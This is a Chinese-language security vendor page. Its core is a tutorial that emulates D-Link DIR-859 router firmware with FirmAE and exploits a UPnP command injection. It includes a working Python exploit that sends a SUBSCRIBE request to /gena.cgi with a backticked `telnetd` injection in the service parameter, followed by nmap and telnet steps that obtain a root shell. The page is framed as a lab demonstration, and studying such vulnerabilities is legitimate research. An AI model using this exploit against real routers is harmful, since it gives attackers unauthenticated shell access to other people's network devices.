存儲(chǔ)域
數(shù)據(jù)庫加密 諾亞防勒索訪問域
數(shù)據(jù)庫防水壩 數(shù)據(jù)庫防火墻 數(shù)據(jù)庫安全審計(jì) 動(dòng)態(tài)脫敏流動(dòng)域
靜態(tài)脫敏 數(shù)據(jù)水印 API審計(jì) API防控 醫(yī)療防統(tǒng)方運(yùn)維服務(wù)
數(shù)據(jù)庫運(yùn)維服務(wù) 中間件運(yùn)維服務(wù) 國產(chǎn)信創(chuàng)改造服務(wù) 駐場(chǎng)運(yùn)維服務(wù) 供數(shù)服務(wù)安全咨詢服務(wù)
數(shù)據(jù)出境安全治理服務(wù) 數(shù)據(jù)安全能力評(píng)估認(rèn)證服務(wù) 數(shù)據(jù)安全風(fēng)險(xiǎn)評(píng)估服務(wù) 數(shù)據(jù)安全治理咨詢服務(wù) 數(shù)據(jù)分類分級(jí)咨詢服務(wù) 個(gè)人信息風(fēng)險(xiǎn)評(píng)估服務(wù) 數(shù)據(jù)安全檢查服務(wù)四年同行,韌性共鑄:西南某商行攜手美創(chuàng)科技再度通過年度容災(zāi)大考
2025-12-26
以“AI+數(shù)據(jù)安全”領(lǐng)雁!祝賀美創(chuàng)牽頭項(xiàng)目入選浙江省科技廳“尖兵領(lǐng)雁”計(jì)劃 !
2025-12-22
美創(chuàng)AI災(zāi)備專家:引領(lǐng)災(zāi)備領(lǐng)域邁入“智能化”時(shí)代
2025-12-15
熱點(diǎn)觀察|美創(chuàng)科技丁斐:數(shù)據(jù)安全 × 價(jià)值共創(chuàng)?可信數(shù)據(jù)空間的 “雙向奔赴”
2025-12-03
美創(chuàng)科技高校供應(yīng)鏈數(shù)據(jù)安全方案斬獲 2025 年度 “金智獎(jiǎng)”
2025-12-03
1.FirmAE 工具安裝
首先拉取FirmAE 工具倉庫
git clone --recursive https://github.com/pr0v3rbs/FirmAE
運(yùn)行下載腳本
cd FirmAE/./download.sh
運(yùn)行./install.sh進(jìn)行安裝
2.下載固件
本文模擬的是設(shè)備型號(hào)為D-Link DIR-859
下載地址:
http://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-859
下載后得到DIR859Ax_FW105b03.bin固件文件
3.FirmAE工具初始化
在FirmAE工具目錄下執(zhí)行./init.sh進(jìn)行初始化
4.安裝binwalk
這里使用FirmAE工具目錄下的binwalk安裝程序進(jìn)行安裝
cd binwalk-2.3.3/python3 setup.py install
5.模擬運(yùn)行固件
執(zhí)行如下命令對(duì)固件進(jìn)行解壓
binwalk -Me /root/DIR859_FW102b03.bin --run-as=root
執(zhí)行如下命令來模擬運(yùn)行固件
sudo ./run.sh -r DIR-859 /root/DIR859_FW102b03.bin
使用瀏覽器訪問http://192.168.0.1,出現(xiàn)如下界面則表明成功模擬了一臺(tái)D-Link DIR-859路由器
查看端口
nmap 192.168.0.1
使用49152端口
EXP內(nèi)容如下:
import socketimport osfrom time import sleepdef httpSUB(server, port, shell_file): con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) Payload = "SUBSCRIBE /gena.cgi?service=" + str(shell_file) + " HTTP/1.0\n" Payload += "Host: " + str(server) + ":" + str(port) + "\n" Payload += "Callback: <http://192.168.126.128:33/>\n" Payload += "NT: upnp:event\n" Payload += "Timeout: Second-1800\n" Payload += "Accept-Encoding: gzip, deflate\n" Payload += "User-Agent: gupnp-universal-cp GUPnP/1.0.2 DLNADOC/1.50\n\n" print(Payload) sleep(1) print('[*] Sending Payload') con.connect((socket.gethostbyname(server),port)) con.send(Payload.encode()) results = con.recv(4096) sleep(1) print('[*] Running Telnetd Service')serverInput = raw_input('IP Router: ')portInput = 49152httpSUB(serverInput, portInput, '`telnetd`')
執(zhí)行EXP
python poc.py
使用nmap掃描可以看到已成功通過漏洞開啟了telnetd服務(wù)
nmap 192.168.0.1
執(zhí)行telnet 192.168.0.1,成功獲取shell
官方訂閱號(hào)
官方服務(wù)號(hào)
第59號(hào)
浙公網(wǎng)安備 33010502006954號(hào) 
